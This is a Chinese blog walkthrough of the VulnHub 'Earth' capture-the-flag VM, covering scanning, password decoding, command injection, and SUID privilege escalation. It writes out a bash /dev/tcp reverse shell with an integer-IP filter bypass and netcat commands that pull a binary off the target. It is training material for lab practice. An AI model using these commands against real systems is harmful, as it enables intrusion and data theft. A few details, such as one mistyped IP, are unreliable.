Earth靶机实验实战演练

已于 2022-11-11 18:37:50 修改
阅读量925 收藏 3
点赞数 1
分类专栏: 学习 文章标签: 网络 服务器 运维
于 2022-11-01 18:50:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianliandad/article/details/127639009
版权

一、主机信息收集

主机存活探测:

be5275077e30460db5b806ebcbfc95c9.png

Kali ip :   192.168.119.130

Earth ip: 192.168.119.129

 

对其端口进行扫描:

f8c3a8003d5a4459abe1a58f23e9b793.png6c597903bb5c4aaf953f49549b93b115.png

5b729356243848f0919be394cd6031de.png

发现开放了22、80、443,并且这里的dns 进行了绑定

在kail上 去修改 hosts 文件,这样我们接下来就可以进行访问了。

进行域名的绑定操作

 

#vim /etc/hosts
修改hosts 文件的配置

 

c0841d55b99f43b4abc51feee782dccb.png

 

二、web信息收集

目录查看

51cfe41b463746cb8133cced41b025b9.png

 

65d48b9ebf9340ddbc874cefb54a9b7f.png

先访问一下,earth.local ,看来只是个主页

ea781d7dcb62449eb6567a69d0e296dd.png

 

在之前扫描80目录的时候,有个登录界面,我们去看看

 

41e6146a6a0541ddaecfdcd90b25ccf1.png

 

点击 Log In 后 ,来到登录界面,发现需要用户名和密码

91ebc77e77e54e0a9737686432a5951c.png

这里暂时无法入手,我们再看看还有没有其他东西可以突破的。

 

 

在之前扫描443目录的时候,有个robots.txt 文件 ,去看看有没有可以操作的。

11e7d17eef8b4d3194df314b85ce259b.png

可见这里有特殊的信息,在最后一行上,是个什么记录来着

 

 

直接去访问 /testingnotes.txt

aac698f7ad934de8ba8b284a72d73338.png

 

 

abe7f10852d44f82affe428a76890743.png

 

解读信息 可知 用户名为 :terra ,密码被加密了,testdata.txt在之前用于测试加密。

看一下这个testdata.txt 文件

01aa3e9c2e3443de85664433c4f37529.png

4cc093a7b9c144958ee13635ff08e434.png

作用:通过三个秘钥去尝试找到用户名为terra对应的密码

 

18df91bdcb434ebba678e58e50078a39.png

最后打印出来,发现重复最多的是earthclimatechangebad4humans,可以大致推断出密码就是这个了。

 

然后进行登录, 访问 earth.local/admin

4fbc4e28a7bc4a45bea7fd8f24540a31.png

 

用户名:terra

密码:earthclimatechangebad4humans

 

三、验证漏洞

发现ls ,whoami 系统命令都可以执行

925f904bc84142cca233de1de354337d.png

df05ea379896455893f41436029d4e9d.png

 

使用find命令查找flag:find / -name "*flag*",

可见可以通过find 命令找到flag

7a052ad5784740eeb9c47fbf1b9f7174.png

再使用cat /var/earth_web/user_flag.txt 的命令去获取flag.

7559daaa551841d3a1e29947e1092058.png 

四、使用反弹shell连接到靶机

 

通过编写个反弹shell:

bash -i >& /dev/tcp/192.168.119.129/4444 0>&1

6fc5604a95e74feeb2fd28d14d376b29.png

这里发现远程连接给禁止了。

我们可用通过ip绕过进行连接

 

b351cca7ceca4e16b580472472992848.png

对ip中的数字进行了过滤,尝试使用十六进制绕过:

注:这里的IP 为kali 端的 ip.

bash -i >& /dev/tcp/3232266114/4444 0>&1

开启一个4444监听端口

3314a5dcc9e3493ab8fa0ae5031c5f49.png

 

 

SUID提权

查看靶机中有权限的二进制文件

find / -perm -u=s -type f 2>/dev/null

 

找到了 reset_root

b4b07bff3e1d4d87abee5ea0d4adff7f.png

 

直接执行发现没有用

06395c9f1d614a8b934e4957bb33a6f5.png

 

先在kali/接收方启动:

nc -l 5555 > reset_root

然后在靶机上(earth)/发送方 启动

nc 172.168.119.130 5555 < /usr/bin/reset_root

 

使用之前需要将 reset_root 赋于执行权限

7ddbfb35d38d40a4a59e7769c0925c76.png

 

从结果可以看到 会有 三个 No such file or directory

access("/dev/shm/kHgTFI5G", F\_OK) = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F\_OK) = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F\_OK) = -1 ENOENT (No such file or directory)

那么可能因为靶机上没有这个三个文件,从而运行失败,那我们去靶机上创建这个三个文件,文件中是什么内容呢?

 

创建,然后运行

949eada9f8fd4fbfb85318b72264192d.png

 

dfb1abdd436c4b64bececdaf18dbb610.png

 

 

恭喜完成!!!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

燕返故人归来
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机操作练习,earth 靶机实战练习
09-08
在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行了主机信息收集。通过探测IP地址192.168.119.129,发现靶机上开放了...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
vulnhub——Earth靶机
Re1_zf的博客
10-28 2044
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1024
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
Earth 靶机实战
最新发布
braty_的博客
04-09 271
这里给出了加密的提示XOR异或加密,应该是要我们解密首页给出的密文。这里发现提权失败,把文件上传到kali,分析一下啥问题。发现君子协议,robots.txt 访问查看内容。发现文件,尝试访问,发现格式为 .txt。发现登陆页面,但不存在SQL注入。密文只有第三个是密码。
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1626
靶机名称Earth
渗透测试-vulnhub靶机 Earth
2301_79441074的博客
11-23 104
dns解析 ,xor解码,
earth靶机攻略
qq_58683895的博客
10-17 58
此处扫描结果有DNS80无法正常访问,因此需要修改hosts配置文件使用dirb扫描这两个不同的域名,以及443https服务下的域名四个结果几乎都是这样只有https的terratest结果不一样此处扫描的有一个robots文本文件访问结果如图此处尝试最后一个访问,发现没有后缀无法访问,只能尝试,因为时notes命名,猜测为.txt因此使用该url访问内容如图。
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
靶机happycorp实战练习
09-08
学习
Planets Earth, Mars and the Moon
12-04
该包提供了这些逼真的行星:地球,火星和月球。五百多mb,高清 Features: - Works on Unity 5 and Unity 4. ( 2 versions ) - Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be dynamically instantiated. - Highly customizable shaders with normals, night lights, specular, and inner atmosheric scattering effect. - Separated clouds and clouds shadows. - Outer atmosphere shader with scattering effect. - High polygon sphere (about 40000 triangles) - A set of 8K textures - Milky Way skybox - Included demo scene that shows how everything works.
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1220
一次打靶记录。
[渗透测试学习靶机01] vulnhub靶场 The Planets: Earth
weixin_47112073的博客
10-10 2744
渗透测试学习,vulnhub靶场练习Earth靶机
vulnhub靶场THE PLANETS:EARTH打靶记录
Bruce_lake的博客
04-20 126
除此之外又知道了一个testdata.txt的文件和前面登录框的用户名terra,既然testdata.txt是用来测试加密的肯定是密文了,再和前面earth.local里那三条已有数据里的一条异或解码,得到的结果说不定就是登陆界面的密码。纠结了半天,突然想起来还有个子域名terratest.earth.local没用到,443端口也闲着,全都拿来再扫一遍,又扫出个robots.txt。跑了一下,发现该靶机貌似有CVE-2021-4034漏洞,去github下个自动化利用脚本,直接root权限。
靶机渗透练习84-The Planets:Earth
hirak0的博客
04-27 2178
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
渗透Earth bajiceshi
m0_70075898的博客
09-22 326
网络安全
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 958
靶机渗透练习-The Planets:Earth
vulnhub的earth靶机训练
ccssggoo的博客
03-11 808
靶机下载地址:The Planets: Earth ~ VulnHub 渗透机:kali2022 靶机:未知linux Earth 老规矩先用netdiscover -r 192.168.10.0/24扫描出靶机ip 扫描靶机 发现靶机开放了22,80,443端口,且绑定了dns信息,需要修改hosts文件才能访问,linux中hosts文件在/etc/hosts,windows在C:\Windows\System32\drivers\etc\hosts,在文件后面加入 渗...
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值